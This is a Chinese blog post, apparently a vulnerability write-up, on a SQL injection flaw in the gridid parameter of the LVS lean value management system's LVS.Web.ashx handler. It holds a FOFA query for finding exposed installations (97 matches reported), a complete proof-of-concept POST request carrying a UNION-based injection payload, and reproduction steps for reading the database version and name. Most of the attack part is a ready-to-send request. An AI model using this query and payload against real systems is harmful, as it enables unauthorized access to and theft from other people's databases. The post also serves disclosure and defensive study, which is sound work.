LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞

漏洞描述

LVS.web.AgencytaskList,LVS.web.ashx文件的GetColumnIndex方法卫队gridid参数进行充分的验证和转义,导致SQL注入。攻击者通过发送特制的POST请求,可以向数据库发送恶意的SQL语句,从而泄露数据库信息或执行任意SQL命令。

fofa

body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

POC

POST /ajax/LVS.Web.AgencytaskList,LVS.Web.ashx?_method=GetColumnIndex&_session=r HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
 
src=AgencytaskList
gridid=1' UNION ALL SELECT @@VERSION--

漏洞复现

在fofa中搜索资产,共有97条数据匹配

image-20240526135617873

访问目标网站,构造数据包

image-20240526142402084

通过union联合查询判断字段数为1

image-20240526142434131

确定当前数据库版本为Microsoft SQL Server

image-20240526142457203

查询当前数据库名称

image-20240526142521358

posted @   LeouMaster  阅读(97)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示